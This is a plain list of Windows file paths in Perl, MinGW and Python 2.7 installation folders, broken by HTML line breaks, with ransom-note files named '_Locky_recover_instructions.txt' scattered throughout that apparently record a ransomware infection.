c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\string.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\unistd.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\stdbool.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\stdfix.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\tgmath.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\tmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\unwind.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\varargs.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\wmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\x86intrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\xmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed\limits.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed\_Locky_recover_instructions.txt<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include-fixed\syslimits.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\gsyslimits.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\_Locky_recover_instructions.txt<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\include\limits.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\install-tools\include\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\CORE\arpa\inet.h<br />
c:\Perl\perl\lib\CORE\arpa\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\CORE\opcode.h<br />
c:\Perl\perl\lib\CORE\opnames.h<br />
c:\Perl\perl\lib\CORE\overload.h<br />
c:\Perl\perl\lib\CORE\pad.h<br />
c:\Perl\perl\lib\CORE\parser.h<br />
c:\Perl\perl\lib\CORE\patchlevel.h<br />
c:\Perl\perl\lib\CORE\perl.h<br />
c:\Perl\perl\lib\CORE\perlapi.h<br />
c:\Perl\perl\lib\CORE\perlhost.h<br />
c:\Perl\perl\lib\CORE\perlio.h<br />
c:\Perl\perl\lib\CORE\perliol.h<br />
c:\Perl\perl\lib\CORE\perlsdio.h<br />
c:\Perl\perl\lib\CORE\perlsfio.h<br />
c:\Perl\perl\lib\CORE\perlvars.h<br />
c:\Perl\perl\lib\CORE\perly.h<br />
c:\Perl\perl\lib\CORE\pp.h<br />
c:\Perl\perl\lib\CORE\pp_proto.h<br />
c:\Perl\perl\lib\CORE\proto.h<br />
c:\Perl\perl\lib\CORE\reentr.h<br />
c:\Perl\perl\lib\CORE\regcharclass.h<br />
c:\Perl\perl\lib\CORE\regcomp.h<br />
c:\Perl\perl\lib\CORE\regexp.h<br />
c:\Perl\perl\lib\CORE\regnodes.h<br />
c:\Perl\perl\lib\CORE\scope.h<br />
c:\Perl\perl\lib\CORE\sv.h<br />
c:\Perl\perl\lib\CORE\sys\socket.h<br />
c:\Perl\perl\lib\CORE\sys\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\CORE\thread.h<br />
c:\Perl\perl\lib\CORE\time64.h<br />
c:\Perl\perl\lib\CORE\time64_config.h<br />
c:\Perl\perl\lib\CORE\uconfig.h<br />
c:\Perl\perl\lib\CORE\unixish.h<br />
c:\Perl\perl\lib\CORE\utf8.h<br />
c:\Perl\perl\lib\CORE\utfebcdic.h<br />
c:\Perl\perl\lib\CORE\util.h<br />
c:\Perl\perl\lib\CORE\uudmap.h<br />
c:\Perl\perl\lib\CORE\vdir.h<br />
c:\Perl\perl\lib\CORE\vmem.h<br />
c:\Perl\perl\lib\CORE\warnings.h<br />
c:\Perl\perl\lib\CORE\win32.h<br />
c:\Perl\perl\lib\CORE\win32iop-o.h<br />
c:\Perl\perl\lib\CORE\win32iop.h<br />
c:\Perl\perl\lib\CORE\win32thread.h<br />
c:\Perl\perl\lib\CORE\wince.h<br />
c:\Perl\perl\lib\CORE\XSUB.h<br />
c:\Perl\perl\lib\Encode\encode.h<br />
c:\Perl\perl\lib\Encode\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbd_xsh.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbipport.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbivport.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\DBIXS.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbixs_rev.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\dbi_sql.h<br />
c:\Perl\perl\vendor\lib\auto\DBI\Driver_xst.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\buffio.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\platform.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\tidyp.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\tidypenum.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite\sqlite3.h<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\Imager\include\draw.h<br />
c:\Perl\perl\vendor\lib\Imager\include\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\Imager\include\dynaload.h<br />
c:\Perl\perl\vendor\lib\Imager\include\ext.h<br />
c:\Perl\perl\vendor\lib\Imager\include\feat.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imager.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imageri.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imconfig.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imdatatypes.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imerror.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imext.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imextdef.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imextpl.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imextpltypes.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imexttypes.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imio.h<br />
c:\Perl\perl\vendor\lib\Imager\include\immacros.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imperl.h<br />
c:\Perl\perl\vendor\lib\Imager\include\imrender.h<br />
c:\Perl\perl\vendor\lib\Imager\include\iolayer.h<br />
c:\Perl\perl\vendor\lib\Imager\include\iolayert.h<br />
c:\Perl\perl\vendor\lib\Imager\include\log.h<br />
c:\Perl\perl\vendor\lib\Imager\include\plug.h<br />
c:\Perl\perl\vendor\lib\Imager\include\ppport.h<br />
c:\Perl\perl\vendor\lib\Imager\include\regmach.h<br />
c:\Perl\perl\vendor\lib\Imager\include\rendert.h<br />
c:\Perl\perl\vendor\lib\Imager\include\stackmach.h<br />
c:\Python27\include\abstract.h<br />
c:\Python27\include\_Locky_recover_instructions.txt<br />
c:\Python27\include\asdl.h<br />
c:\Python27\include\ast.h<br />
c:\Python27\include\bitset.h<br />
c:\Python27\include\boolobject.h<br />
c:\Python27\include\bufferobject.h<br />
c:\Python27\include\bytearrayobject.h<br />
c:\Python27\include\bytesobject.h<br />
c:\Python27\include\bytes_methods.h<br />
c:\Python27\include\cellobject.h<br />
c:\Python27\include\ceval.h<br />
c:\Python27\include\classobject.h<br />
c:\Python27\include\cobject.h<br />
c:\Python27\include\code.h<br />
c:\Python27\include\codecs.h<br />
c:\Python27\include\compile.h<br />
c:\Python27\include\complexobject.h<br />
c:\Python27\include\cStringIO.h<br />
c:\Python27\include\datetime.h<br />
c:\Python27\include\descrobject.h<br />
c:\Python27\include\dictobject.h<br />
c:\Python27\include\dtoa.h<br />
c:\Python27\include\enumobject.h<br />
c:\Python27\include\errcode.h<br />
c:\Python27\include\eval.h<br />
c:\Python27\include\fileobject.h<br />
c:\Python27\include\floatobject.h<br />
c:\Python27\include\frameobject.h<br />
c:\Python27\include\funcobject.h<br />
c:\Python27\include\genobject.h<br />
c:\Python27\include\graminit.h<br />
c:\Python27\include\grammar.h<br />
c:\Python27\include\import.h<br />
c:\Python27\include\intobject.h<br />
c:\Python27\include\intrcheck.h<br />
c:\Python27\include\iterobject.h<br />
c:\Python27\include\listobject.h<br />
c:\Python27\include\longintrepr.h<br />
c:\Python27\include\longobject.h<br />
c:\Python27\include\marshal.h<br />
c:\Python27\include\memoryobject.h<br />
c:\Python27\include\metagrammar.h<br />
c:\Python27\include\methodobject.h<br />
c:\Python27\include\modsupport.h<br />
c:\Python27\include\moduleobject.h<br />
c:\Python27\include\node.h<br />
c:\Python27\include\object.h<br />
c:\Python27\include\objimpl.h<br />
c:\Python27\include\opcode.h<br />
c:\Python27\include\osdefs.h<br />
c:\Python27\include\parsetok.h<br />
c:\Python27\include\patchlevel.h<br />
c:\Python27\include\pgen.h<br />
c:\Python27\include\pgenheaders.h<br />
c:\Python27\include\pyarena.h<br />
c:\Python27\include\pycapsule.h<br />
c:\Python27\include\pyconfig.h<br />
c:\Python27\include\pyctype.h<br />
c:\Python27\include\pydebug.h<br />
c:\Python27\include\pyerrors.h<br />
c:\Python27\include\pyexpat.h<br />
c:\Python27\include\pyfpe.h<br />
c:\Python27\include\pygetopt.h<br />
c:\Python27\include\pymacconfig.h<br />
c:\Python27\include\pymactoolbox.h<br />
c:\Python27\include\pymath.h<br />
c:\Python27\include\pymem.h<br />
c:\Python27\include\pyport.h<br />
c:\Python27\include\pystate.h<br />
c:\Python27\include\pystrcmp.h<br />
c:\Python27\include\pystrtod.h<br />
c:\Python27\include\Python-ast.h<br />
c:\Python27\include\Python.h<br />
c:\Python27\include\pythonrun.h<br />
c:\Python27\include\pythread.h<br />
c:\Python27\include\py_curses.h<br />
c:\Python27\include\rangeobject.h<br />
c:\Python27\include\setobject.h<br />
c:\Python27\include\sliceobject.h<br />
c:\Python27\include\stringobject.h<br />
c:\Python27\include\structmember.h<br />
c:\Python27\include\structseq.h<br />
c:\Python27\include\symtable.h<br />
c:\Python27\include\sysmodule.h<br />
c:\Python27\include\timefuncs.h<br />
c:\Python27\include\token.h<br />
c:\Python27\include\traceback.h<br />
c:\Python27\include\tupleobject.h<br />
c:\Python27\include\ucnhash.h<br />
c:\Python27\include\unicodeobject.h<br />
c:\Python27\include\warnings.h<br />
c:\Python27\include\weakrefobject.h<br />
c:\Perl\c\i686-w64-mingw32\include\ks.h<br />
c:\Perl\perl\lib\CORE\op.h<br />
c:\Perl\perl\lib\CORE\nostdio.h<br />
c:\Perl\perl\lib\CORE\netdb.h<br />
c:\Perl\perl\lib\CORE\mydtrace.h<br />
c:\Perl\perl\lib\CORE\mg.h<br />
c:\Perl\perl\lib\CORE\malloc_ctl.h<br />
c:\Perl\perl\lib\CORE\keywords.h<br />
c:\Perl\perl\lib\CORE\iperlsys.h<br />
c:\Perl\perl\lib\CORE\intrpvar.h<br />
c:\Python27\tcl\tix8.4.3\pref\Bisque.cs<br />
c:\Python27\tcl\tix8.4.3\pref\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tix8.4.3\pref\Blue.cs<br />
c:\Python27\tcl\tix8.4.3\pref\Gray.cs<br />
c:\Python27\tcl\tix8.4.3\pref\SGIGray.cs<br />
c:\Python27\tcl\tix8.4.3\pref\TixGray.cs<br />
c:\Python27\tcl\tix8.4.3\pref\TK.cs<br />
c:\Python27\tcl\tix8.4.3\pref\TkWin.cs<br />
c:\Python27\tcl\tix8.4.3\pref\WmDefault.cs<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ko.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\lt.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\lv.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\mt.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\nb.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\nn.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\nso.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\om.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\pl.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ro.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ru.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\se.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\sk.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\sl.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\sq.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\sv.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\tn.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\to.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\tr.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\uk.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\vi.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\wo.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\yo.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh_big5.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh_gb.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh_pin.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\zh_strk.pl<br />
c:\Perl\perl\lib\unicore\CombiningClass.pl<br />
c:\Perl\perl\lib\unicore\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\Decomposition.pl<br />
c:\Perl\perl\lib\unicore\Heavy.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\1_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Age\2_0.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\2_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\3_0.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\3_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\3_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\4_0.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\4_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\5_0.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\5_1.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\5_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Age\Unassign.pl<br />
c:\Perl\perl\lib\unicore\lib\AHex\N.pl<br />
c:\Perl\perl\lib\unicore\lib\AHex\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\AHex\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Alpha\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Alpha\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Alpha\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\AL.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Bc\AN.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\B.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\BN.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\CS.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\EN.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\ES.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\ET.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\L.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\LRE.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\LRO.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\NSM.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\ON.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\PDF.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\R.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\RLE.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\RLO.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\S.pl<br />
c:\Perl\perl\lib\unicore\lib\Bc\WS.pl<br />
c:\Perl\perl\lib\unicore\lib\BidiC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\BidiC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\BidiC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\BidiM\N.pl<br />
c:\Perl\perl\lib\unicore\lib\BidiM\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\BidiM\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\AegeanNu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Blk\Alphabet.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ancient2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\AncientG.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\AncientS.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Arabic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ArabicP2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ArabicPr.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ArabicSu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Armenian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Arrows.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ASCII.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Avestan.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Balinese.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Bamum.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Bengali.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\BlockEle.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Bopomof2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Bopomofo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\BoxDrawi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\BrailleP.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Buginese.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Buhid.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Byzantin.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Canadian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Carian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cham.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cherokee.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKComp2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKComp3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKComp4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKCompa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKRadic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKStrok.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKSymbo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKUnif2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKUnif3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKUnif4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CJKUnifi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Combini2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Combini3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Combini4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Combinin.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CommonIn.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\ControlP.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Coptic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Counting.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cuneifo2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cuneifor.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Currency.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\CypriotS.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cyrilli2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cyrilli3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cyrilli4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Cyrillic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Deseret.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Devanag2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Devanaga.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Dingbats.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\DominoTi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Egyptian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Enclose2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Enclose3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Enclose4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Enclosed.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ethiopi2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ethiopi3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ethiopic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\GeneralP.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Geometri.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Georgia2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Georgian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Glagolit.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Gothic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Greek.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\GreekExt.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Gujarati.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Gurmukhi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Halfwidt.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulCo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulJ2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulJ3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulJa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HangulSy.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Hanunoo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Hebrew.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HighPriv.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\HighSurr.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Hiragana.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ideograp.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Imperial.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Inscrip2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Inscript.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\IPAExten.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Javanese.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Kaithi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Kanbun.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\KangxiRa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Kannada.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Katakan2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Katakana.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\KayahLi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Kharosht.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Khmer.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\KhmerSym.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lao.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Latin1.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinEx2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinEx3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinEx4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinEx5.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LatinExt.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lepcha.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Letterli.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Limbu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LinearBI.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LinearBS.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lisu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\LowSurro.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lycian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Lydian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\MahjongT.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Malayala.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Mathema2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Mathemat.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\MeeteiMa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscell2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscell3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscell4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscell5.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Miscella.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Modifier.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Mongolia.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\MusicalS.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Myanmar.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\MyanmarE.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\NewTaiLu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\NKo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\NoBlock.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\NumberFo.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ogham.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OlChiki.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OldItali.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OldPersi.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OldSouth.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OldTurki.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\OpticalC.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Oriya.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Osmanya.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\PhagsPa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Phaistos.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Phoenici.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Phoneti2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Phonetic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\PrivateU.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Rejang.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\RumiNume.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Runic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Samarita.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Saurasht.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Shavian.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Sinhala.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\SmallFor.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\SpacingM.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Specials.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Sundanes.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Superscr.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Supplem2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Supplem3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Supplem4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Supplem5.pl<br />
